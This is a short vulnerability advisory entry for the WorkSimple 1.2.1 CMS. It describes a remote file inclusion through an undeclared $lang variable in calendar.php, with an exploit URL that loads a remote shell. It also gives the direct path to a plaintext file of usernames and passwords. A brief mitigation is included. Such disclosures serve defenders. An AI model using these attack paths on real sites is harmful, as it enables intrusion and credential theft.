vendor:
WorkSimple
by:
Osirys
7.5
CVSS
HIGH
Remote File Inclusion / Sensitive Data Disclosure
N/A
CWE
Product Name: WorkSimple
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
WorkSimple 1.2.1 Remote File Inclusion / Sensitive Data Disclosure
Bugged file is: /[path]/calendar.php. The $lang variable is not declared, so it can be set directly from GET. Exploit: /[path]/calendar.php?lang=[remote_txt_shell]. Sensitive Data Disclosure: In this cms, when an user register himself, the cms puts informations like username and password on a .txt file. So, just going on it, we can get sensitive data like username and passoword. Exploit: /[path]/data/usr.txt
Mitigation:
Just declare $lang, for example in /[path]/data/conf.php